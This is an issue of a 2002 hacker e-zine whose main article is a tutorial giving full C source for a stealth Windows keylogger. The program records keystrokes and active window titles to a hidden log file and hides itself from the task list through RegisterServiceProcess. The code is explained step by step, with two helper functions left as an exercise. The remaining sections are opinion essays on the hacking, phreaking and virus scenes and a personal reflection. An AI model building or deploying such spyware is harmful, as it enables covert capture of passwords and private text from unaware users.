|
The Hitchhiker's World |
|
Soli Deo gloria - To God alone be glory |
|
|
|
Publication Date: April - May 2002 |
|
Editor: Arun Koshy |
|
Contributors : Ayan Chakrabarti |
DISCLAIMER : [Insert the biggest, most comprehensive lawyerspeak here]. Securitywriters.org (SWG) or the author(s) are NOT RESPONSIBLE for anything that happens to you, ur cat, dog, sexlife or wife after you go through the information presented below. Enjoy.
After the release of Issue #2, my friends
@ SWG decided to attempt to make this effort mainstream. This column would feature
technical issues (primarily) and some room for personal expression.
I advocate a "hands-on" approach .. we're not looking to rewrite whats'
already been written. Read/Write a book if you want to do that. Get to the code
or go straight to the point. You're free to send in your entries, comments etc
to hwcol@arunkoshy.cjb.net
Contents
Suggested Links :
HW issue #2 , Phrack
, The Underground
book , Coderz.net ,
Neworder
Music :
Joe Satriani (Crying, Always with me - Always with you, Circles, Tears in
the Rain)
Oasis (Champagne Supernova, Morning Glory, Wonderwall)
Advanced Meal - A keylogger in
an API
By Ayan Chakrabarti
Ok. In the last article we looked into the GetAsyncKeyState API (or should I say KPI - Keylogger Programming Interface ;) and made a small program which used this API to detect keystrokes in all applications.
That program is going to form the core of our keylogger. But before we proceed we have to realise a few things
All right then, this is what we have to do. Lets start coding !!!
Ok, let's look at the file KBDLOG.C first. I suggest you just go through the code first before going on to the following explanations.
-=-= KBDLOG.C STARTS HERE -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
#include <windows.h>
#include <stdio.h>
#include <string.h>
int istime(void);
void getfname(char * fname);
unsigned int nlist[] = { 8,9,12,13,19,20,27,32,33,34,35,36,37,38,39,
40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,
57,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,
81,82,83,84,85,86,87,88,89,90,91,93,96,97,98,99,100,
101,102,103,104,105,106,107,108,109,110,111,112,113,
114,115,116,117,118,119,120,121,122,123,124,125,126,
127,128,129,130,131,132,133,134,135,144,145,186,187,
188,189,190,191,192,219,220,221,222,223,224,225,226,
227,228,230,233,234,235,236,237,238,239,240,241,242,
243,244,245,246,247,248,249,250,251,252,253,254,0};
int APIENTRY WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPTSTR lpCmdLine, int nCmdShow)
{
MSG msg;
int i,alt,shf,ctrl;
FILE * fp;
HWND hw;
char fn[1024],wint[1024],buf[1024],dirn[1024],fn2[1024];
HANDLE h;
HMODULE hKERNEL32;
FARPROC a_Register;
if ( (hKERNEL32 = GetModuleHandle("KERNEL32.DLL")) != NULL)
if( ( a_Register = GetProcAddress(hKERNEL32,"RegisterServiceProcess")) != NULL)
a_Register( GetCurrentProcessId(), 1);
GetWindowsDirectory(dirn,990);
strcat(dirn,"\\KBDLOG");
strcpy(fn,dirn);
strcat(fn,"\\LOGFILE.KEY");
strcpy(wint,"");
while(1)
{
if(PeekMessage(&msg,NULL,0,0,0))
if(msg.message == WM_QUIT)
return 1;
for(i = 0;nlist[i] != 0;i++)
{
if(GetAsyncKeyState(nlist[i]) == -32767)
break;
if(i%15 == 0)
if(PeekMessage(&msg,NULL,0,0,0))
if(msg.message == WM_QUIT)
return 1;
}
if(nlist[i] == 0)
continue;
if(PeekMessage(&msg,NULL,0,0,0))
if(msg.message == WM_QUIT)
return 1;
hw = GetForegroundWindow();
GetWindowText(hw,buf,1023);
alt = shf = ctrl = 0;
if(GetAsyncKeyState(16) != 0)
shf = 1;
if(GetAsyncKeyState(17) != 0)
ctrl = 1;
if(GetAsyncKeyState(18) != 0)
alt = 1;
if(PeekMessage(&msg,NULL,0,0,0))
if(msg.message == WM_QUIT)
return 1;
if(istime())
{
getfname(fn2);
MoveFile(fn,fn2);
strcpy(wint,"");
}
fp = fopen(fn,"ab");
if(!fp)
{
CreateDirectory(dirn,NULL);
fp = fopen(fn,"ab");
}
if(strcmp(buf,wint) != 0)
{
strcpy(wint,buf);
fputc(0,fp);
fwrite(wint,strlen(wint)+1,1,fp);
}
if(alt || shf || ctrl)
{
fputc(1,fp);
fputc(alt,fp);
fputc(shf,fp);
fputc(ctrl,fp);
}
fputc(nlist[i],fp);
fclose(fp);
}
}
-=-= KBDLOG.C ENDS HERE -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
We'll leave the functions istime() and getftime() for the time being. The nlist array contains a list of all key scan codes which we want to log and is terminated by a 0. Let's go straight to the WinMain function. As you may know, the WinMain function is the what's called by the system when the program is run (like main is called in normal C programs).
Stealth:
Now the first thing that we come to is the following block of code -
if ( (hKERNEL32 = GetModuleHandle("KERNEL32.DLL")) != NULL)
if( ( a_Register = GetProcAddress(hKERNEL32,"RegisterServiceProcess")) != NULL)
a_Register( GetCurrentProcessId(), 1);
This is the code which is going to make us invisible in the task list. To pull this off, we use the API called RegisterServiceProcess. We call it with our process's ID (which we retrieve using GetCurrentProcessId) and the keylogger is registered as a system service and ceases to appear in the task list.
Now you may ask why we just don't go ahead and do
RegisterServiceProcess( GetCurrentProcessId(), 1);
The reason is simple. This API is only provided on Win 9x systems. It is not available on NT/2k machines. So if we were to call it directly, our program would generally give an error when run on an NT or 2k machine. So, we try loading the API dynamically, checking to see if it is available and calling it only if it is. Don't worry about this too much. Just remember that this will make the keylogger invisible on Win 9x systems.
Initialization:
The next few lines initialise a few things which will be used in the program.
GetWindowsDirectory(dirn,990);
strcat(dirn,"\\KBDLOG");
strcpy(fn,dirn);
strcat(fn,"\\LOGFILE.KEY");
strcpy(wint,"");
The variable fn is the file to which we have to log the keystrokes. The variable wint is to hold the title of the current window. Its initialised to a blank string to begin with.
The Main Loop:
Before we study the loop, you'll see a set of statements appearing again
and again.
if(PeekMessage(&msg,NULL,0,0,0))
if(msg.message == WM_QUIT)
return 1;
Ok, I won't go into an indepth explanation of Windows messages, but here's a brief explanation. Windows lets programs know various things through messages like what keypresses, mouseclicks, etc and when they need to repaint their windows and when they need to shut down. A program should periodically check to see what messages are waiting for it otherwise problems can arise. For example, the system might be going for a shut down but the program refuses to quit. Also, on Win 9x systems, such a program might cause degradation of system performance. So, the lesson is that you should check up on your messages periodically.
PeekMessage is the function we use to get our messages. The reason we're using it instead of GetMessage (which you'll find in most examples) is because GetMessage blocks, ie. it won't return until there's a message waiting for the program. This is obviously undesirable. So we use PeekMessage which returns immediately with a non-zero if a message is waiting or with a zero if no message is there. Then we see if there's a WM_QUIT waiting for us, we quit our program.
Ok now for the main loop. Wherever I've put the above lines (PeekMessage et al), I'll replace with {CheckMessages} for clarity.
while(1)
{
{CheckMessages}
for(i = 0;nlist[i] != 0;i++)
{
if(GetAsyncKeyState(nlist[i]) == -32767)
break;
if(i%15 == 0)
{CheckMessages}
}
if(nlist[i] == 0)
continue;
OK. The first few lines should be familiar to you. They're pretty similar to the shell program we made last time. We check to see if a key in our list has been pressed since last time. Otherwise, continue in the loop. But if a key has been pressed ....
{CheckMessages}
hw = GetForegroundWindow();
GetWindowText(hw,buf,1023);
If a key has been pressed, we get the title of the current window. The API GetForegroundWindow() returns a handle to the currently active window, and GetWindowText is used to retrive the window title.
alt = shf = ctrl = 0;
if(GetAsyncKeyState(16) != 0)
shf = 1;
if(GetAsyncKeyState(17) != 0)
ctrl = 1;
if(GetAsyncKeyState(18) != 0)
alt = 1;
{CheckMessages}
Then we check the status of the [ALT], [SHIFT] and [CONTROL] keys. This helps in properly recording key-combinations. Now that we've done all the preliminaries, its time to write the stuff to the file.
if(istime())
{
getfname(fn2);
MoveFile(fn,fn2);
strcpy(wint,"");
}
These lines will check if it is time to split our logfile. If istime() returns true (we'll discuss istime later, for now we'll assume that istime will return true whenever the logfile needs to be splitted), the current logfile will be renamed to a different name and we'll start logging into a fresh log file.
fp = fopen(fn,"ab");
if(!fp)
{
CreateDirectory(dirn,NULL);
fp = fopen(fn,"ab");
}
if(strcmp(buf,wint) != 0)
{
strcpy(wint,buf);
fputc(0,fp);
fwrite(wint,strlen(wint)+1,1,fp);
}
if(alt || shf || ctrl)
{
fputc(1,fp);
fputc(alt,fp);
fputc(shf,fp);
fputc(ctrl,fp);
}
fputc(nlist[i],fp);
fclose(fp);
}
This last bit opens the log file and dumps the recorded keystroke into the file. If the Window title has changed since last logging (ie. focus has shifted to a new window), we also write the title of the window into the file. Before we write the title, we output the ASCII value 0 to let the reader (which we'll write later) know that a window title is coming up. Similarly, if the ALT,SHIFT or CONTROL keys are pressed, we output ASCII vaule 1 followed by the states of these keys so that the reader can properly interpret key combinations.
With this we come to the end of this article. In the next article,
The program kbdlog.c is not compilable as such since the functions istime and getfname are not defined. You might try making these functions on your own deciding when the log files should be split and what the old log files should be called. This is left as an exercise.
Till the next article then .....
H/P/V - The Inc. story
By Arun Darlie Koshy
I strongly believe that the world is nothing but a fractal. Events, places, people and movements .. everything is repetetive in a large or small, subtle or loud way. I do not believe that im qualified to comment or say the things im about to say. But heck, I don't think that ever was an issue with me :-).
It seems we are at an inflexion point. I've had the opportunity to be a lurker/participant in the void for the past 7 years. We may have met under different faces or times. The timeframe presented many interesting viewpoints or "shifts". I've seen anarchy growing up to wear a suit n tie.
Civilization, it seems, has'nt spared Mentor's clan either.
H, the tale of two cities
Frankly speaking H has become like the music scene today. Everything is law
abiding and subscribing to a format. We have big places to accumulate, irc rooms,
message boards, "hills", "armies", honeypots and the elders.
Shame on you if you don't belong somewhere or have'nt published a X yet (where
X can be a tutorial,advisory or crap like this ;-).
It is wrong or lame to ask how to break hotmail. Then again, you suspect its got something to do with the fact that it may be difficult to do so (leaving aside the lil peculiar theoretical plays of CSS, number tags, problems with your stupid browser or client-side attacks).
Funny how all of us say the first statement under an air of "you're so stupid, u don't even know this ?!, its too boring for me to tell u how k ? go away lamer!" .. anybody for "im too dumb to do it k ? please figure it out and tell me also, wake me up from my slumber" ?
I've come to a point where i've stopped reading. It freaks me out, another tutorial on FTP, or how the damned TCP/IP works, or how to convert binary to decimal,or wtf is a virus, how to set up trojans, or the unix manual (every rudimentary command's man page done by a million people seperately) or the nth tutorial on C,perl or x n y.
All of it written by people who propably have'nt broken into a single system, coded anything above 10k or done anything original in their entire lives. And the few who actually do know something, find it tough to see beyond their own lives and are in deed wise in choosing that option. (i know both these statements are dangerously generalizing).
You even have a widely read and respected "How to become a hacker" doc. I remember that you have to learn Python, HTML to be one. Everything is the product of a "system". The open source movement,or to the latest zine. It is good. But we should not forget to call a bluff. We're in the goody good era. Everything is rosy. Peachy. Sickeningly sweet. It is either a cubicle or a classroom. We've moved from pipe bombs to discussions on "ethical hacking" or "Blackhat vs Whitehat".
Tell you what, let us stop being clintonian and messing with words and for the time being we will be what the media says we are. We love the limelight.
Time for me to work on my articles and I-am-elite programs. Have to move up the ladder you know. Become famous. The dichotomy of me. I thought of saying something stupid (this time im aware of it ;-)), here goes...
Hack O Genie, grant me the power to break into every system and that no one can break into mine.
P, the mystery that never was
There comes only one thought to my mind when I hear about phreaking .. wish
I could figure out what to do to get my phone bills low. Now from reading the
docs i've read, its all some boxes, cards, cellphones and the historical whistle
from a cereal box. I've kept Bluebeep for the sake of my being a collector.
This world does not even have a "how to hack hotmail ?" question. Talk/Bribe to your lineman. Use a scale or a coin. These are the tricks I've figured out here. Since I'm gutless to even do the above, i prefer to get shafted by the phone company.Pretty pathetic eh ?
In short P was dead before my time (and others of my age group ;-) for all practical reasons. Maybe its too close to being seedy,criminal or slimy. It was never even born here in my country where the telex system is FUBAR 24-7 and too chaotic to deserve study.
All my friends in the USA, u don't know how lucky you are to get your local calls free.
I will bake a cake and send whatever is within my reach to the gal or guy who writes Phreaking 101 (post 2k) or World Domination 101 (the Microsoft case study). These are the two ways I see myself continuing to have my life, equipment and a cycle on the information superhighway.
V, Microsoft pulled the plug (unknowingly)
Read my earlier
article. Now we come to the current sitiuation. As expected, the brakes
were pulled moment we shifted to a *nix model... the current sitiuation was
easily predictable by the number of V efforts for the *nix or NT world. The
V scene propably will mutate and integrate into something much different in
feel and texture. The good people may still have it in them to bend a few more
rules.
First of all the playing field will change with the death of a dominant PC operating system. Now we would be talking about devices, network appliances and an enlightened user who loves to try out 10 different operating systems.
A real good reference to understand all whats happening would be the latest 29A #6 (if u excuse some druggy articles ;-) ).
Some problems currently (from what i've heard from friends in the scene) are an abundance of people who don't code (resonant with the h scene here ;-) and the lack of clear thinking or relevant instruction for new members.
But I guess the basic issue(s) are :
PS : I also think its time to phase out the word "PC". We should call it something like PID (Personal Information Device). Okay Mr.History, please note, that is my word!!
Welcome to my world
By Arun Darlie Koshy
It's been quite a month. I took a much needed break. During the last few days, I've been trying very hard to churn out something for this release. Quickly, I realized that it would be a compromise on my ideas regarding creativity. Its tough removing ego, or developing the healthy dose of insensitivity towards the demands of the outer world.
Frankly speaking, I've been quite detached from technology (computers, networks, crap) except using it as an instrument to remain in touch with loved ones and enhance my learning. Its a blessing that I've been attracted to the concept of experiencing joy rather than try fit myself into some particular way.
God has been kind enough to calm me down. Make me see what I can manage to change, open the doors towards music (learning the guitar, writing poetry has brought out the same feeling I got years ago trying to program :-)). Still trying hard to appreciate the value of friendship and love. Recently I was watching a show (won't name cause u would laugh ;-) in which one of the characters say "If you go long enough without love, you realize that its the only thing". The month also presented very peculiar sitiuations.
Also, I
Think about :
I read what I wrote above many times before sending it out. Each time it is
different. Ranging from laughable, hypocritical, corny, sad, part of the story..
i have no idea... many of those times, i felt like never putting this out.
But, in a moment of strength or weakness and after lot of goody-goody editing,
I've decided to put this strange collage of thoughts onto this very public medium.
LoL .. don't worry Hitch has'nt lost it yet. I will try to write something more
"conventional" next time. My main objective was to get Ayan's good
work to you all ASAP.
Thats it for this time. This has been another cathartic attempt. Good night to you all...